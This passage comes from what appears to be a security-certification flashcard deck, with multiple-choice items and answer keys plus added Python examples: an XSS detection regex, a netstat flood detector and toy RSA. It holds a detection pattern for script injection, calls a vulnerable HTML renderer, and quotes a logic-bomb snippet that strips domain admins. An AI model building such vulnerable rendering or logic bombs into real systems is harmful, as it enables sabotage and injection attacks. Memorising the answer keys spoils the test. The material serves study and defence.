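    r"|\son\w+\s*="        # inline event handler such as onerror=
    r"|javascript\s*:",    # javascript: URL
    re.IGNORECASE,
)


def contains_active_markup(rendered_html: str) -> bool:
    return ACTIVE_MARKUP.search(rendered_html) is not None


def triage_comments(comments: List[str]) -> List[str]:
    """Stored comments that would execute if rendered without escaping."""
    return [c for c in comments if contains_active_markup(render_vulnerable(c))]


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD))
    print(render_safe(PAYLOAD))
```

`html.escape` is the right encoding for element content only; a value placed inside an attribute, a URL or a script block needs the encoding for that context. A Content-Security-Policy that disallows inline script is the defence-in-depth layer for the case where escaping is missed. The triage regex is a review aid, not a sanitizer: it misses obfuscated payloads and must not replace output encoding.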

92
Q

Which of the following documents would provide specific guidance regarding ports and protocols that should
be disabled on an operating system?
A. Regulatory requirements
B. Secure configuration guide
C. Application installation guides
D. User manuals

A

B. Secure configuration guide

93
Q

A security analyst is investigating a call from a user regarding one of the websites receiving a 503: Service
Unavailable error. The analyst runs a netstat -an command to discover if the web server is up and
listening. The analyst receives the following output:
TCP 10.1.5.2:80 192.168.2.112:60973 TIME_WAIT
TCP 10.1.5.2:80 192.168.2.112:60974 TIME_WAIT
TCP 10.1.5.2:80 192.168.2.112:60975 TIME_WAIT
TCP 10.1.5.2:80 192.168.2.112:60976 TIME_WAIT
TCP 10.1.5.2:80 192.168.2.112:60977 TIME_WAIT
TCP 10.1.5.2:80 192.168.2.112:60978 TIME_WAIT
Which of the following types of attack is the analyst seeing?
A. Buffer overflow
B. Domain hijacking
C. Denial of service
D. ARP poisoning

A

C. Denial of service
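
The netstat excerpt shows one client cycling through ephemeral ports against port 80, leaving the server's side in TIME_WAIT. The following is an added example, not part of the deck, that parses such output, confirms whether the service is still listening and flags any remote host holding an abnormal number of sockets. The six TIME_WAIT lines are the card's; the LISTENING, SYN_RECEIVED and ESTABLISHED lines are constructed to show the contrast, and the threshold of five is an arbitrary assumption.

```python
import re
from collections import Counter, defaultdict
from typing import Dict, List, Tuple

# Constructed netstat -an excerpt: the six lines from the card plus a listening
# socket, two half-open connections from the same client and one legitimate
# established connection.
NETSTAT_OUTPUT = """\
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING
TCP 10.1.5.2:80 192.168.2.112:60973 TIME_WAIT
TCP 10.1.5.2:80 192.168.2.112:60974 TIME_WAIT
TCP 10.1.5.2:80 192.168.2.112:60975 TIME_WAIT
TCP 10.1.5.2:80 192.168.2.112:60976 TIME_WAIT
TCP 10.1.5.2:80 192.168.2.112:60977 TIME_WAIT
TCP 10.1.5.2:80 192.168.2.112:60978 TIME_WAIT
TCP 10.1.5.2:80 192.168.2.112:60979 SYN_RECEIVED
TCP 10.1.5.2:80 192.168.2.112:60980 SYN_RECEIVED
TCP 10.1.5.2:80 10.1.7.20:51002 ESTABLISHED
"""

LINE_RE = re.compile(
    r"^(?P<proto>TCP|UDP)\s+(?P<laddr>\S+):(?P<lport>\d+)\s+"
    r"(?P<raddr>\S+):(?P<rport>\d+)\s+(?P<state>\S+)$"
)


def parse_netstat(output: str) -> List[dict]:
    """One dict per connection line; lines that do not match the format are skipped."""
    rows = []
    for line in output.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            row = m.groupdict()
            row["lport"] = int(row["lport"])
            row["rport"] = int(row["rport"])
            rows.append(row)
    return rows


def is_listening(output: str, port: int) -> bool:
    """True if a socket on the port is in LISTEN/LISTENING, i.e. the server process is up."""
    return any(r["lport"] == port and r["state"].startswith("LISTEN")
               for r in parse_netstat(output))


def connections_by_remote(output: str, port: int) -> Dict[str, Counter]:
    """remote IP -> Counter of connection states on the given local port."""
    by_remote: Dict[str, Counter] = defaultdict(Counter)
    for r in parse_netstat(output):
        if r["lport"] == port and not r["state"].startswith("LISTEN"):
            by_remote[r["raddr"]][r["state"]] += 1
    return by_remote


def detect_flood(output: str, port: int = 80,
                 threshold: int = 5) -> List[Tuple[str, int, Counter]]:
    """Remote hosts holding at least `threshold` sockets on the port, busiest first."""
    hits = []
    for ip, states in connections_by_remote(output, port).items():
        total = sum(states.values())
        if total >= threshold:
            hits.append((ip, total, states))
    return sorted(hits, key=lambda h: h[1], reverse=True)


if __name__ == "__main__":
    print("port 80 listening:", is_listening(NETSTAT_OUTPUT, 80))
    for ip, total, states in detect_flood(NETSTAT_OUTPUT):
        print(f"{ip}: {total} sockets {dict(states)}")
```

A listening socket together with a 503 points at exhausted worker capacity rather than a dead process, and a pile of TIME_WAIT entries from a single source means rapid connect-and-close cycles from that host. Because only one source appears, this is a DoS, not a DDoS; the web server's access log is the place to confirm the request rate before blocking the address.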

94
Q

Which of the following serves to warn users against downloading and installing pirated software on company
devices?
A. AUP
B. NDA
C. ISA
D. BPA

A

A. AUP

95
Q

An organization wants to set up a wireless network in the most secure way. Budget is not a major
consideration, and the organization is willing to accept some complexity when clients are connecting. It is also
willing to deny wireless connectivity for clients who cannot be connected in the most secure manner. Which of
the following would be the MOST secure setup that conforms to the organization’s requirements?
A. Enable WPA2-PSK for older clients and WPA2-Enterprise for all other clients.
B. Enable WPA2-PSK, disable all other modes, and implement MAC filtering along with port security.
C. Use WPA2-Enterprise with RADIUS and disable pre-shared keys.
D. Use WPA2-PSK with a 24-character complex password and change the password monthly.

A

C. Use WPA2-Enterprise with RADIUS and disable pre-shared keys.

96
Q

A first responder needs to collect digital evidence from a compromised headless virtual host. Which of the
following should the first responder collect FIRST?
A. Virtual memory
B. BIOS configuration
C. Snapshot
D. RAM

A

C. Snapshot

97
Q

Which of the following BEST explains the difference between a credentialed scan and a non-credentialed
scan?
A. A credentialed scan sees devices in the network, including those behind NAT, while a non-credentialed
scan sees outward-facing applications.
B. A credentialed scan will not show up in system logs because the scan is running with the necessary
authorization, while non-credentialed scan activity will appear in the logs.
C. A credentialed scan generates significantly more false positives, while a non-credentialed scan generates
fewer false positives.
D. A credentialed scan sees the system the way an authorized user sees the system, while a non-credentialed scan sees the system as a guest.

A

D. A credentialed scan sees the system the way an authorized user sees the system, while a non-credentialed scan sees the system as a guest.

98
Q

Using a one-time code that has been texted to a smartphone is an example of:
A. something you have.
B. something you know.
C. something you do.
D. something you are.

A

A. something you have.

99
Q

The exploitation of a buffer-overrun vulnerability in an application will MOST likely lead to:
A. arbitrary code execution.
B. resource exhaustion.
C. exposure of authentication credentials.
D. dereferencing of memory pointers.

A

A. arbitrary code execution.

100
Q

A security professional wants to test a piece of malware that was isolated on a user’s computer to document
its effect on a system. Which of the following is the FIRST step the security professional should take?
A. Create a sandbox on the machine.
B. Open the file and run it.
C. Create a secure baseline of the system state.
D. Harden the machine.

A

C. Create a secure baseline of the system state.

101
Q

In highly secure environments where the risk of malicious actors attempting to steal data is high, which of the
following is the BEST reason to deploy Faraday cages?
A. To provide emanation control to prevent credential harvesting
B. To minimize signal attenuation over distances to maximize signal strength
C. To minimize external RF interference with embedded processors
D. To protect the integrity of audit logs from malicious alteration

A

A. To provide emanation control to prevent credential harvesting

102
Q

Which of the following is the proper use of a Faraday cage?

A. To block electronic signals sent to erase a cell phone
B. To capture packets sent to a honeypot during an attack
C. To protect hard disks from access during a forensics investigation
D. To restrict access to a building allowing only one person to enter at a time

A

A. To block electronic signals sent to erase a cell phone

103
Q

A security administrator found the following piece of code referenced on a domain controller’s task scheduler:
$var = GetDomainAdmins
If $var != 'fabio'
SetDomainAdmins = NULL
With which of the following types of malware is the code associated?
A. RAT
B. Backdoor
C. Logic bomb
D. Crypto-malware

A

C. Logic bomb

104
Q

An email recipient is unable to open a message encrypted through PKI that was sent from another
organization. Which of the following does the recipient need to decrypt the message?
A. The sender’s private key
B. The recipient’s private key
C. The recipient’s public key
D. The CA’s root certificate
E. The sender’s public key
F. An updated CRL

A

B. The recipient’s private key
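
The card is easy to get backwards because the sender's public key is needed for a different PKI operation, verifying a signature. The following is an added example, not part of the deck, using textbook RSA with toy primes (constructed keys; a real PKI uses moduli of 2048 bits or more and wraps a symmetric content key rather than encrypting the message directly). It encrypts a message to the recipient, tries every key in play, and shows that only the recipient's private key recovers it, while the sender's keys are what sign and verify.

```python
from math import gcd
from typing import Dict, List, Tuple

Key = Tuple[int, int]  # (exponent, modulus)


def make_keypair(p: int, q: int, e: int = 17) -> Tuple[Key, Key]:
    """Textbook RSA from two primes. Returns (public, private)."""
    n = p * q
    phi = (p - 1) * (q - 1)
    if gcd(e, phi) != 1:
        raise ValueError("e must be coprime to phi(n)")
    d = pow(e, -1, phi)  # modular inverse (Python 3.8+)
    return (e, n), (d, n)


def apply_key(value: int, key: Key) -> int:
    """Raw RSA operation; encrypt, decrypt, sign and verify all reduce to it."""
    exp, n = key
    return pow(value, exp, n)


# Constructed toy keys for the two parties; the message must be below every modulus.
SENDER_PUB, SENDER_PRIV = make_keypair(61, 53)
RECIPIENT_PUB, RECIPIENT_PRIV = make_keypair(89, 97)
MESSAGE = 42


def encrypt_for_recipient(message: int, recipient_public: Key) -> int:
    """Confidentiality: anyone can encrypt to the recipient using the public key."""
    return apply_key(message, recipient_public)


def sign(message: int, sender_private: Key) -> int:
    """Authenticity: only the holder of the private key can produce the signature."""
    return apply_key(message, sender_private)


def verify(message: int, signature: int, sender_public: Key) -> bool:
    """Anyone holding the sender's public key can check the signature."""
    return apply_key(signature, sender_public) == message


def keys_that_recover(ciphertext: int, expected: int, keys: Dict[str, Key]) -> List[str]:
    """Names of the keys under which the raw RSA operation yields the plaintext."""
    return [name for name, key in keys.items() if apply_key(ciphertext, key) == expected]


CANDIDATE_KEYS = {
    "sender private": SENDER_PRIV,
    "sender public": SENDER_PUB,
    "recipient public": RECIPIENT_PUB,
    "recipient private": RECIPIENT_PRIV,
}

if __name__ == "__main__":
    ct = encrypt_for_recipient(MESSAGE, RECIPIENT_PUB)
    print("ciphertext:", ct)
    print("keys that decrypt it:", keys_that_recover(ct, MESSAGE, CANDIDATE_KEYS))
    sig = sign(MESSAGE, SENDER_PRIV)
    print("signature verifies with sender's public key:", verify(MESSAGE, sig, SENDER_PUB))
```

The CA's root certificate and an up-to-date CRL matter for deciding whether to trust the sender's certificate, and the sender's public key validates the signature; none of them can undo an encryption that was performed with the recipient's public key. Raw RSA as shown here has no padding and is not safe for real use; it is only meant to make the key roles visible.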

105
Q

An employee opens a web browser and types a URL into the address bar. Instead of reaching the requested
site, the browser opens a completely different site. Which of the following types of attacks have MOST likely
occurred? (Choose two.)
A. DNS hijacking
B. Cross-site scripting
C. Domain hijacking
D. Man-in-the-browser
E. Session hijacking

A

A. DNS hijacking
C. Domain hijacking
